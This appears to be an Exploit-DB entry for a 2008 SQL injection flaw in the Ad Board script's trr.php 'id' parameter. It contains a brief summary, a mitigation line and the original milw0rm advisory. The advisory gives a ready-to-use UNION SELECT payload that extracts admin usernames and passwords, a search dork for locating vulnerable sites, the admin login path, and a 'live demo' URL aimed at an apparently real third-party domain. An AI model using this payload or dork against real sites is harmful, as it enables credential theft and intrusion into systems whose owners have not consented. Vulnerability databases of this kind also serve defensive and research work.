Ad Board (trr.php id) Remote SQL Injection Vulnerability

vendor:

Ad Board

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Ad Board

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ad Board (trr.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Ad Board, which is a web-based advertisement board. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a specially crafted SQL query that can be used to extract sensitive information from the database, such as usernames and passwords. The vulnerable parameter is the 'id' parameter in the 'trr.php' script. An example exploit is www.[target].com/Script/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| Ad Board (trr.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.yourfreeworld.com/script/adboard.php
|
| DorK   : inurl:trr.php?id=
|___________________________________________________|

Exploit: 
________



www.[target].com/Script/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--






L!VE DEMO:
_________


http://www.downlinegoldmine.com/adboard/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--


____________

Admin Login :

www.[target].com/Script/admin.php

____________
____________________________( Greetz )____________________________
|
| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|  
| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-19]